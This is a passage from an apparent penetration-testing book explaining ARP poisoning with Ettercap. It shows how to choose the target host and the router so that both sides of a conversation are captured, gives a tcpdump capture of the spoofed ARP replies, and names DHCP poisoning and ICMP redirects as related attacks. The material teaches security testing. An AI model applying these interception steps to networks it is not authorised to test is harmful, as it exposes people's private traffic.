Figure 2-8. Using Ettercap The reason for having two targets is to make sure to get both sides of a conversation.
If I poison only one party, I will get only half of the conversation. I assume that what I
want to gather is communication between my target and the internet. As a result, I set
my target as one host and the router on my network as the second host. If I needed to
acquire traffic between two systems on my network, I would select those. One would
be in Target 1, and the other would be in Target 2. In
Example 2-13
, you can see what
an ARP poison attack looks like from a packet capture. You will see the two ARP
replies where the IP addresses belong to my targets. I included a portion of the
ifcon‐ fig output on my system so you can see that the MAC address caught in the packet
capture is the MAC address of my system, where I was running the ARP spoofing
attack.
Example 2-13. tcpdump showing ARP poison attack 17:06:46.690545 ARP, Reply rosebud.lan is-at 00:0c:29:94:ce:06
(
oui Unknown
)
,
length 28
17:06:46.690741 ARP, Reply testwifi.here is-at 00:0c:29:94:ce:06
(
oui Unknown
)
,
length 28
17:06:46.786532 ARP, Request who-has localhost.lan tell savagewood.lan, length 46
^C
43
packets captured
43
packets received by filter
0
packets dropped by kernel
root@kali:~# ifconfig eth0
eth0:
flags
=
4163 mtu 1500
inet 192.168.86.227 netmask 255.255.255.0 broadcast 192.168.86.255
Poisoning Attacks | 71
inet6 fe80::20c:29ff:fe94:ce06 prefixlen
64
scopeid 0x20
ether 00:0c:29:94:ce:06 txqueuelen
1000
(
Ethernet
)
Once I have an ARP spoofing attack in place, I can capture entire conversations by
using
tcpdump or Wireshark. Keep in mind that this sort of attack works on only the
local network. This is because the MAC address is a layer 2 address so it stays on the
local network and doesn’t cross over any layer 3 boundary (moving from one network
to another). Ettercap also supports other layer 2 attacks like DHCP poisoning and
ICMP redirect attacks. Any of these may be ways to ensure you are grabbing traffic
from other systems on your local network.
